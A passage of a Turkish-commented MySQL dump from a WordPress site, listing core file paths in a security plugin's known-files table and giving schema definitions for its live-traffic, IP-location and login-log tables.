(4680, 'wp-includes/js/jquery/ui/core.min.js'),
(4681, 'wp-includes/js/jquery/ui/datepicker.min.js'),
(4682, 'wp-includes/js/jquery/ui/dialog.min.js'),
(4683, 'wp-includes/js/jquery/ui/draggable.min.js'),
(4684, 'wp-includes/js/jquery/ui/droppable.min.js'),
(4685, 'wp-includes/js/jquery/ui/effect-blind.min.js'),
(4686, 'wp-includes/js/jquery/ui/effect-bounce.min.js'),
(4687, 'wp-includes/js/jquery/ui/effect-clip.min.js'),
(4688, 'wp-includes/js/jquery/ui/effect-drop.min.js'),
(4689, 'wp-includes/js/jquery/ui/effect-explode.min.js'),
(4690, 'wp-includes/js/jquery/ui/effect-fade.min.js'),
(4691, 'wp-includes/js/jquery/ui/effect-fold.min.js'),
(4692, 'wp-includes/js/jquery/ui/effect-highlight.min.js'),
(4693, 'wp-includes/js/jquery/ui/effect-puff.min.js'),
(4694, 'wp-includes/js/jquery/ui/effect-pulsate.min.js'),
(4695, 'wp-includes/js/jquery/ui/effect-scale.min.js'),
(4696, 'wp-includes/js/jquery/ui/effect-shake.min.js'),
(4697, 'wp-includes/js/jquery/ui/effect-size.min.js'),
(4698, 'wp-includes/js/jquery/ui/effect-slide.min.js'),
(4699, 'wp-includes/js/jquery/ui/effect-transfer.min.js'),
(4700, 'wp-includes/js/jquery/ui/effect.min.js'),
(4701, 'wp-includes/js/jquery/ui/menu.min.js'),
(4702, 'wp-includes/js/jquery/ui/mouse.min.js'),
(4703, 'wp-includes/js/jquery/ui/position.min.js'),
(4704, 'wp-includes/js/jquery/ui/progressbar.min.js'),
(4705, 'wp-includes/js/jquery/ui/resizable.min.js'),
(4706, 'wp-includes/js/jquery/ui/selectable.min.js'),
(4707, 'wp-includes/js/jquery/ui/selectmenu.min.js'),
(4708, 'wp-includes/js/jquery/ui/slider.min.js'),
(4709, 'wp-includes/js/jquery/ui/sortable.min.js'),
(4710, 'wp-includes/js/jquery/ui/spinner.min.js'),
(4711, 'wp-includes/js/jquery/ui/tabs.min.js'),
(4712, 'wp-includes/js/jquery/ui/tooltip.min.js'),
(4713, 'wp-includes/js/jquery/ui/widget.min.js'),
(4714, 'wp-includes/js/json2.js'),
(4715, 'wp-includes/js/json2.min.js'),
(4716, 'wp-includes/js/masonry.min.js'),
(4717, 'wp-includes/js/mce-view.js'),
(4718, 'wp-includes/js/mce-view.min.js'),
(4719, 'wp-includes/js/media-audiovideo.js'),
(4720, 'wp-includes/js/media-audiovideo.min.js'),
(4721, 'wp-includes/js/media-editor.js'),
(4722, 'wp-includes/js/media-editor.min.js'),
(4723, 'wp-includes/js/media-grid.js'),
(4724, 'wp-includes/js/media-grid.min.js'),
(4725, 'wp-includes/js/media-models.js'),
(4726, 'wp-includes/js/media-models.min.js'),
(4727, 'wp-includes/js/media-views.js'),
(4728, 'wp-includes/js/media-views.min.js'),
(4729, 'wp-includes/js/mediaelement/mediaelement-and-player.js'),
(4730, 'wp-includes/js/mediaelement/mediaelement-and-player.min.js'),
(4731, 'wp-includes/js/mediaelement/mediaelement-migrate.js'),
(4732, 'wp-includes/js/mediaelement/mediaelement-migrate.min.js'),
(4733, 'wp-includes/js/mediaelement/mediaelement.js'),
(4734, 'wp-includes/js/mediaelement/mediaelement.min.js'),
(4735, 'wp-includes/js/mediaelement/mediaelementplayer-legacy.css'),
(4736, 'wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css'),
(4737, 'wp-includes/js/mediaelement/mediaelementplayer.css'),
(4738, 'wp-includes/js/mediaelement/mediaelementplayer.min.css'),
(4739, 'wp-includes/js/mediaelement/mejs-controls.png'),
(4740, 'wp-includes/js/mediaelement/mejs-controls.svg'),
(4741, 'wp-includes/js/mediaelement/renderers/vimeo.js'),
(4742, 'wp-includes/js/mediaelement/renderers/vimeo.min.js'),
(4743, 'wp-includes/js/mediaelement/wp-mediaelement.css'),
(4744, 'wp-includes/js/mediaelement/wp-mediaelement.js'),
(4745, 'wp-includes/js/mediaelement/wp-mediaelement.min.css'),
(4746, 'wp-includes/js/mediaelement/wp-mediaelement.min.js'),
(4747, 'wp-includes/js/mediaelement/wp-playlist.js'),
(4748, 'wp-includes/js/mediaelement/wp-playlist.min.js'),
(4749, 'wp-includes/js/plupload/handlers.js'),
(4750, 'wp-includes/js/plupload/handlers.min.js'),
(4751, 'wp-includes/js/plupload/license.txt'),
(4752, 'wp-includes/js/plupload/moxie.js'),
(4753, 'wp-includes/js/plupload/moxie.min.js'),
(4754, 'wp-includes/js/plupload/plupload.js'),
(4755, 'wp-includes/js/plupload/plupload.min.js'),
(4756, 'wp-includes/js/plupload/wp-plupload.js'),
(4757, 'wp-includes/js/plupload/wp-plupload.min.js'),
(4758, 'wp-includes/js/quicktags.js'),
(4759, 'wp-includes/js/quicktags.min.js'),
(4760, 'wp-includes/js/shortcode.js'),
(4761, 'wp-includes/js/shortcode.min.js'),
(4762, 'wp-includes/js/swfobject.js'),
(4763, 'wp-includes/js/swfupload/handlers.js'),
(4764, 'wp-includes/js/swfupload/handlers.min.js'),
(4765, 'wp-includes/js/swfupload/license.txt'),
(4766, 'wp-includes/js/swfupload/swfupload.js'),
(4767, 'wp-includes/js/thickbox/loadingAnimation.gif'),
(4768, 'wp-includes/js/thickbox/macFFBgHack.png'),
(4769, 'wp-includes/js/thickbox/thickbox.css'),
(4770, 'wp-includes/js/thickbox/thickbox.js'),
(4771, 'wp-includes/js/tinymce/langs/wp-langs-en.js'),
(4772, 'wp-includes/js/tinymce/license.txt'),
(4773, 'wp-includes/js/tinymce/plugins/charmap/plugin.js'),
(4774, 'wp-includes/js/tinymce/plugins/charmap/plugin.min.js'),
(4775, 'wp-includes/js/tinymce/plugins/colorpicker/plugin.js'),
(4776, 'wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js'),
(4777, 'wp-includes/js/tinymce/plugins/compat3x/css/dialog.css'),
(4778, 'wp-includes/js/tinymce/plugins/compat3x/plugin.js'),
(4779, 'wp-includes/js/tinymce/plugins/compat3x/plugin.min.js'),
(4780, 'wp-includes/js/tinymce/plugins/directionality/plugin.js'),
(4781, 'wp-includes/js/tinymce/plugins/directionality/plugin.min.js'),
(4782, 'wp-includes/js/tinymce/plugins/fullscreen/plugin.js'),
(4783, 'wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js'),
(4784, 'wp-includes/js/tinymce/plugins/hr/plugin.js'),
(4785, 'wp-includes/js/tinymce/plugins/hr/plugin.min.js'),
(4786, 'wp-includes/js/tinymce/plugins/image/plugin.js'),
(4787, 'wp-includes/js/tinymce/plugins/image/plugin.min.js'),
(4788, 'wp-includes/js/tinymce/plugins/link/plugin.js'),
(4789, 'wp-includes/js/tinymce/plugins/link/plugin.min.js'),
(4790, 'wp-includes/js/tinymce/plugins/lists/plugin.js'),
(4791, 'wp-includes/js/tinymce/plugins/lists/plugin.min.js'),
(4792, 'wp-includes/js/tinymce/plugins/media/plugin.js'),
(4793, 'wp-includes/js/tinymce/plugins/media/plugin.min.js'),
(4794, 'wp-includes/js/tinymce/plugins/paste/plugin.js'),
(4795, 'wp-includes/js/tinymce/plugins/paste/plugin.min.js'),
(4796, 'wp-includes/js/tinymce/plugins/tabfocus/plugin.js'),
(4797, 'wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js'),
(4798, 'wp-includes/js/tinymce/plugins/textcolor/plugin.js'),
(4799, 'wp-includes/js/tinymce/plugins/textcolor/plugin.min.js'),
(4800, 'wp-includes/js/tinymce/plugins/wordpress/plugin.js'),
(4801, 'wp-includes/js/tinymce/plugins/wordpress/plugin.min.js'),
(4802, 'wp-includes/js/tinymce/plugins/wpautoresize/plugin.js'),
(4803, 'wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js'),
(4804, 'wp-includes/js/tinymce/plugins/wpdialogs/plugin.js'),
(4805, 'wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js'),
(4806, 'wp-includes/js/tinymce/plugins/wpeditimage/plugin.js'),
(4807, 'wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js'),
(4808, 'wp-includes/js/tinymce/plugins/wpemoji/plugin.js'),
(4809, 'wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js'),
(4810, 'wp-includes/js/tinymce/plugins/wpgallery/plugin.js'),
(4811, 'wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js'),
(4812, 'wp-includes/js/tinymce/plugins/wplink/plugin.js'),
(4813, 'wp-includes/js/tinymce/plugins/wplink/plugin.min.js'),
(4814, 'wp-includes/js/tinymce/plugins/wptextpattern/plugin.js'),
(4815, 'wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js'),
(4816, 'wp-includes/js/tinymce/plugins/wpview/plugin.js'),
(4817, 'wp-includes/js/tinymce/plugins/wpview/plugin.min.js'),
(4818, 'wp-includes/js/tinymce/skins/lightgray/content.inline.min.css'),
(4819, 'wp-includes/js/tinymce/skins/lightgray/content.min.css'),
(4820, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot'),
(4821, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg'),
(4822, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf'),
(4823, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff'),
(4824, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot'),
(4825, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg'),
(4826, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf'),
(4827, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff'),
(4828, 'wp-includes/js/tinymce/skins/lightgray/img/anchor.gif'),
(4829, 'wp-includes/js/tinymce/skins/lightgray/img/loader.gif'),
(4830, 'wp-includes/js/tinymce/skins/lightgray/img/object.gif'),
(4831, 'wp-includes/js/tinymce/skins/lightgray/img/trans.gif'),
(4832, 'wp-includes/js/tinymce/skins/lightgray/skin.min.css'),
(4833, 'wp-includes/js/tinymce/skins/wordpress/images/audio.png'),
(4834, 'wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png'),
(4835, 'wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png'),
(4836, 'wp-includes/js/tinymce/skins/wordpress/images/embedded.png'),
(4837, 'wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png'),
(4838, 'wp-includes/js/tinymce/skins/wordpress/images/gallery.png'),
(4839, 'wp-includes/js/tinymce/skins/wordpress/images/more-2x.png'),
(4840, 'wp-includes/js/tinymce/skins/wordpress/images/more.png'),
(4841, 'wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png'),
(4842, 'wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png'),
(4843, 'wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png'),
(4844, 'wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png'),
(4845, 'wp-includes/js/tinymce/skins/wordpress/images/video.png'),
(4846, 'wp-includes/js/tinymce/skins/wordpress/wp-content.css'),
(4847, 'wp-includes/js/tinymce/themes/inlite/theme.js'),
(4848, 'wp-includes/js/tinymce/themes/inlite/theme.min.js'),
(4849, 'wp-includes/js/tinymce/themes/modern/theme.js'),
(4850, 'wp-includes/js/tinymce/themes/modern/theme.min.js'),
(4851, 'wp-includes/js/tinymce/tiny_mce_popup.js'),
(4852, 'wp-includes/js/tinymce/tinymce.min.js'),
(4853, 'wp-includes/js/tinymce/utils/editable_selects.js'),
(4854, 'wp-includes/js/tinymce/utils/form_utils.js'),
(4855, 'wp-includes/js/tinymce/utils/mctabs.js'),
(4856, 'wp-includes/js/tinymce/utils/validate.js'),
(4857, 'wp-includes/js/tinymce/wp-tinymce.js'),
(4858, 'wp-includes/js/tinymce/wp-tinymce.php'),
(4859, 'wp-includes/js/tw-sack.js'),
(4860, 'wp-includes/js/tw-sack.min.js'),
(4861, 'wp-includes/js/twemoji.js'),
(4862, 'wp-includes/js/twemoji.min.js'),
(4863, 'wp-includes/js/underscore.js'),
(4864, 'wp-includes/js/underscore.min.js'),
(4865, 'wp-includes/js/utils.js'),
(4866, 'wp-includes/js/utils.min.js'),
(4867, 'wp-includes/js/wp-ajax-response.js'),
(4868, 'wp-includes/js/wp-ajax-response.min.js'),
(4869, 'wp-includes/js/wp-api.js'),
(4870, 'wp-includes/js/wp-api.min.js'),
(4871, 'wp-includes/js/wp-auth-check.js'),
(4872, 'wp-includes/js/wp-auth-check.min.js'),
(4873, 'wp-includes/js/wp-backbone.js'),
(4874, 'wp-includes/js/wp-backbone.min.js'),
(4875, 'wp-includes/js/wp-custom-header.js'),
(4876, 'wp-includes/js/wp-custom-header.min.js'),
(4877, 'wp-includes/js/wp-embed-template.js'),
(4878, 'wp-includes/js/wp-embed-template.min.js'),
(4879, 'wp-includes/js/wp-embed.js'),
(4880, 'wp-includes/js/wp-embed.min.js'),
(4881, 'wp-includes/js/wp-emoji-loader.js'),
(4882, 'wp-includes/js/wp-emoji-loader.min.js'),
(4883, 'wp-includes/js/wp-emoji-release.min.js'),
(4884, 'wp-includes/js/wp-emoji.js'),
(4885, 'wp-includes/js/wp-emoji.min.js'),
(4886, 'wp-includes/js/wp-list-revisions.js'),
(4887, 'wp-includes/js/wp-list-revisions.min.js'),
(4888, 'wp-includes/js/wp-lists.js'),
(4889, 'wp-includes/js/wp-lists.min.js'),
(4890, 'wp-includes/js/wp-pointer.js'),
(4891, 'wp-includes/js/wp-pointer.min.js'),
(4892, 'wp-includes/js/wp-sanitize.js'),
(4893, 'wp-includes/js/wp-sanitize.min.js'),
(4894, 'wp-includes/js/wp-util.js'),
(4895, 'wp-includes/js/wp-util.min.js'),
(4896, 'wp-includes/js/wpdialog.js'),
(4897, 'wp-includes/js/wpdialog.min.js'),
(4898, 'wp-includes/js/wplink.js'),
(4899, 'wp-includes/js/wplink.min.js'),
(4900, 'wp-includes/js/zxcvbn-async.js'),
(4901, 'wp-includes/js/zxcvbn-async.min.js'),
(4902, 'wp-includes/js/zxcvbn.min.js'),
(4903, 'wp-includes/kses.php'),
(4904, 'wp-includes/l10n.php'),
(4905, 'wp-includes/link-template.php'),
(4906, 'wp-includes/load.php'),
(4907, 'wp-includes/locale.php'),
(4908, 'wp-includes/media-template.php'),
(4909, 'wp-includes/media.php'),
(4910, 'wp-includes/meta.php'),
(4911, 'wp-includes/ms-blogs.php'),
(4912, 'wp-includes/ms-default-constants.php'),
(4913, 'wp-includes/ms-default-filters.php'),
(4914, 'wp-includes/ms-deprecated.php'),
(4915, 'wp-includes/ms-files.php'),
(4916, 'wp-includes/ms-functions.php'),
(4917, 'wp-includes/ms-load.php'),
(4918, 'wp-includes/ms-network.php'),
(4919, 'wp-includes/ms-settings.php'),
(4920, 'wp-includes/ms-site.php'),
(4921, 'wp-includes/nav-menu-template.php'),
(4922, 'wp-includes/nav-menu.php'),
(4923, 'wp-includes/option.php'),
(4924, 'wp-includes/pluggable-deprecated.php'),
(4925, 'wp-includes/pluggable.php'),
(4926, 'wp-includes/plugin.php'),
(4927, 'wp-includes/pomo/entry.php'),
(4928, 'wp-includes/pomo/mo.php'),
(4929, 'wp-includes/pomo/plural-forms.php'),
(4930, 'wp-includes/pomo/po.php'),
(4931, 'wp-includes/pomo/streams.php'),
(4932, 'wp-includes/pomo/translations.php'),
(4933, 'wp-includes/post-formats.php'),
(4934, 'wp-includes/post-template.php'),
(4935, 'wp-includes/post-thumbnail-template.php'),
(4936, 'wp-includes/post.php'),
(4937, 'wp-includes/query.php'),
(4938, 'wp-includes/random_compat/byte_safe_strings.php'),
(4939, 'wp-includes/random_compat/cast_to_int.php'),
(4940, 'wp-includes/random_compat/error_polyfill.php'),
(4941, 'wp-includes/random_compat/random.php'),
(4942, 'wp-includes/random_compat/random_bytes_com_dotnet.php'),
(4943, 'wp-includes/random_compat/random_bytes_dev_urandom.php'),
(4944, 'wp-includes/random_compat/random_bytes_libsodium.php'),
(4945, 'wp-includes/random_compat/random_bytes_libsodium_legacy.php'),
(4946, 'wp-includes/random_compat/random_bytes_mcrypt.php'),
(4947, 'wp-includes/random_compat/random_int.php'),
(4948, 'wp-includes/registration-functions.php'),
(4949, 'wp-includes/registration.php'),
(4950, 'wp-includes/rest-api/class-wp-rest-request.php'),
(4951, 'wp-includes/rest-api/class-wp-rest-response.php'),
(4952, 'wp-includes/rest-api/class-wp-rest-server.php'),
(4953, 'wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),
(4954, 'wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),
(4955, 'wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),
(4956, 'wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),
(4957, 'wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),
(4958, 'wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),
(4959, 'wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),
(4960, 'wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),
(4961, 'wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),
(4962, 'wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),
(4963, 'wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),
(4964, 'wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),
(4965, 'wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),
(4966, 'wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),
(4967, 'wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),
(4968, 'wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),
(4969, 'wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),
(4970, 'wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),
(4971, 'wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),
(4972, 'wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),
(4973, 'wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),
(4974, 'wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),
(4975, 'wp-includes/rest-api/search/class-wp-rest-search-handler.php'),
(4976, 'wp-includes/rest-api.php'),
(4977, 'wp-includes/revision.php'),
(4978, 'wp-includes/rewrite.php'),
(4979, 'wp-includes/rss-functions.php'),
(4980, 'wp-includes/rss.php'),
(4981, 'wp-includes/script-loader.php'),
(4982, 'wp-includes/session.php'),
(4983, 'wp-includes/shortcodes.php'),
(4984, 'wp-includes/sodium_compat/LICENSE'),
(4985, 'wp-includes/sodium_compat/autoload.php'),
(4986, 'wp-includes/sodium_compat/composer.json'),
(4987, 'wp-includes/sodium_compat/lib/constants.php'),
(4988, 'wp-includes/sodium_compat/lib/namespaced.php'),
(4989, 'wp-includes/sodium_compat/lib/php72compat.php'),
(4990, 'wp-includes/sodium_compat/lib/php72compat_const.php'),
(4991, 'wp-includes/sodium_compat/lib/sodium_compat.php'),
(4992, 'wp-includes/sodium_compat/namespaced/Compat.php'),
(4993, 'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),
(4994, 'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),
(4995, 'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),
(4996, 'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),
(4997, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),
(4998, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),
(4999, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),
(5000, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),
(5001, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),
(5002, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),
(5003, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),
(5004, 'wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),
(5005, 'wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),
(5006, 'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),
(5007, 'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),
(5008, 'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),
(5009, 'wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),
(5010, 'wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),
(5011, 'wp-includes/sodium_compat/namespaced/Core/SipHash.php'),
(5012, 'wp-includes/sodium_compat/namespaced/Core/Util.php'),
(5013, 'wp-includes/sodium_compat/namespaced/Core/X25519.php'),
(5014, 'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),
(5015, 'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),
(5016, 'wp-includes/sodium_compat/namespaced/Crypto.php'),
(5017, 'wp-includes/sodium_compat/namespaced/File.php'),
(5018, 'wp-includes/sodium_compat/src/Compat.php'),
(5019, 'wp-includes/sodium_compat/src/Core/BLAKE2b.php'),
(5020, 'wp-includes/sodium_compat/src/Core/Base64/Common.php'),
(5021, 'wp-includes/sodium_compat/src/Core/Base64/Original.php'),
(5022, 'wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),
(5023, 'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),
(5024, 'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),
(5025, 'wp-includes/sodium_compat/src/Core/ChaCha20.php'),
(5026, 'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),
(5027, 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),
(5028, 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),
(5029, 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),
(5030, 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),
(5031, 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),
(5032, 'wp-includes/sodium_compat/src/Core/Curve25519/H.php'),
(5033, 'wp-includes/sodium_compat/src/Core/Curve25519/README.md'),
(5034, 'wp-includes/sodium_compat/src/Core/Curve25519.php'),
(5035, 'wp-includes/sodium_compat/src/Core/Ed25519.php'),
(5036, 'wp-includes/sodium_compat/src/Core/HChaCha20.php'),
(5037, 'wp-includes/sodium_compat/src/Core/HSalsa20.php'),
(5038, 'wp-includes/sodium_compat/src/Core/Poly1305/State.php'),
(5039, 'wp-includes/sodium_compat/src/Core/Poly1305.php'),
(5040, 'wp-includes/sodium_compat/src/Core/Salsa20.php'),
(5041, 'wp-includes/sodium_compat/src/Core/SecretStream/State.php'),
(5042, 'wp-includes/sodium_compat/src/Core/SipHash.php'),
(5043, 'wp-includes/sodium_compat/src/Core/Util.php'),
(5044, 'wp-includes/sodium_compat/src/Core/X25519.php'),
(5045, 'wp-includes/sodium_compat/src/Core/XChaCha20.php'),
(5046, 'wp-includes/sodium_compat/src/Core/XSalsa20.php'),
(5047, 'wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),
(5048, 'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),
(5049, 'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),
(5050, 'wp-includes/sodium_compat/src/Core32/ChaCha20.php'),
(5051, 'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),
(5052, 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),
(5053, 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),
(5054, 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),
(5055, 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),
(5056, 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),
(5057, 'wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),
(5058, 'wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),
(5059, 'wp-includes/sodium_compat/src/Core32/Curve25519.php'),
(5060, 'wp-includes/sodium_compat/src/Core32/Ed25519.php'),
(5061, 'wp-includes/sodium_compat/src/Core32/HChaCha20.php'),
(5062, 'wp-includes/sodium_compat/src/Core32/HSalsa20.php'),
(5063, 'wp-includes/sodium_compat/src/Core32/Int32.php'),
(5064, 'wp-includes/sodium_compat/src/Core32/Int64.php'),
(5065, 'wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),
(5066, 'wp-includes/sodium_compat/src/Core32/Poly1305.php'),
(5067, 'wp-includes/sodium_compat/src/Core32/Salsa20.php'),
(5068, 'wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),
(5069, 'wp-includes/sodium_compat/src/Core32/SipHash.php'),
(5070, 'wp-includes/sodium_compat/src/Core32/Util.php'),
(5071, 'wp-includes/sodium_compat/src/Core32/X25519.php'),
(5072, 'wp-includes/sodium_compat/src/Core32/XChaCha20.php'),
(5073, 'wp-includes/sodium_compat/src/Core32/XSalsa20.php'),
(5074, 'wp-includes/sodium_compat/src/Crypto.php'),
(5075, 'wp-includes/sodium_compat/src/Crypto32.php'),
(5076, 'wp-includes/sodium_compat/src/File.php'),
(5077, 'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),
(5078, 'wp-includes/sodium_compat/src/SodiumException.php'),
(5079, 'wp-includes/spl-autoload-compat.php'),
(5080, 'wp-includes/taxonomy.php'),
(5081, 'wp-includes/template-loader.php'),
(5082, 'wp-includes/template.php'),
(5083, 'wp-includes/theme-compat/comments.php'),
(5084, 'wp-includes/theme-compat/embed-404.php'),
(5085, 'wp-includes/theme-compat/embed-content.php'),
(5086, 'wp-includes/theme-compat/embed.php'),
(5087, 'wp-includes/theme-compat/footer-embed.php'),
(5088, 'wp-includes/theme-compat/footer.php'),
(5089, 'wp-includes/theme-compat/header-embed.php'),
(5090, 'wp-includes/theme-compat/header.php'),
(5091, 'wp-includes/theme-compat/sidebar.php'),
(5092, 'wp-includes/theme.php'),
(5093, 'wp-includes/update.php'),
(5094, 'wp-includes/user.php'),
(5095, 'wp-includes/vars.php'),
(5096, 'wp-includes/version.php'),
(5097, 'wp-includes/widgets/class-wp-nav-menu-widget.php'),
(5098, 'wp-includes/widgets/class-wp-widget-archives.php'),
(5099, 'wp-includes/widgets/class-wp-widget-calendar.php'),
(5100, 'wp-includes/widgets/class-wp-widget-categories.php'),
(5101, 'wp-includes/widgets/class-wp-widget-custom-html.php'),
(5102, 'wp-includes/widgets/class-wp-widget-links.php'),
(5103, 'wp-includes/widgets/class-wp-widget-media-audio.php'),
(5104, 'wp-includes/widgets/class-wp-widget-media-gallery.php'),
(5105, 'wp-includes/widgets/class-wp-widget-media-image.php'),
(5106, 'wp-includes/widgets/class-wp-widget-media-video.php'),
(5107, 'wp-includes/widgets/class-wp-widget-media.php'),
(5108, 'wp-includes/widgets/class-wp-widget-meta.php'),
(5109, 'wp-includes/widgets/class-wp-widget-pages.php'),
(5110, 'wp-includes/widgets/class-wp-widget-recent-comments.php'),
(5111, 'wp-includes/widgets/class-wp-widget-recent-posts.php'),
(5112, 'wp-includes/widgets/class-wp-widget-rss.php'),
(5113, 'wp-includes/widgets/class-wp-widget-search.php'),
(5114, 'wp-includes/widgets/class-wp-widget-tag-cloud.php'),
(5115, 'wp-includes/widgets/class-wp-widget-text.php'),
(5116, 'wp-includes/widgets.php'),
(5117, 'wp-includes/wlwmanifest.xml'),
(5118, 'wp-includes/wp-db.php'),
(5119, 'wp-includes/wp-diff.php'),
(5120, 'wp-links-opml.php'),
(5121, 'wp-load.php'),
(5122, 'wp-login.php'),
(5123, 'wp-mail.php'),
(5124, 'wp-settings.php'),
(5125, 'wp-signup.php'),
(5126, 'wp-trackback.php'),
(5127, 'xmlrpc.php');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wflivetraffichuman`
--

CREATE TABLE `zdenl_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wflocs`
--

CREATE TABLE `zdenl_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) UNSIGNED NOT NULL,
  `failed` tinyint(3) UNSIGNED NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT '0.0000000',
  `lon` float(10,7) DEFAULT '0.0000000'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wflogins`
--

CREATE TABLE `zdenl_wflogins` (
  `id` int(10) UNSIGNED NOT NULL,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) UNSIGNED NOT NULL,
  `fail` tinyint(3) UNSIGNED NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) UNSIGNED NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wflogins`
--

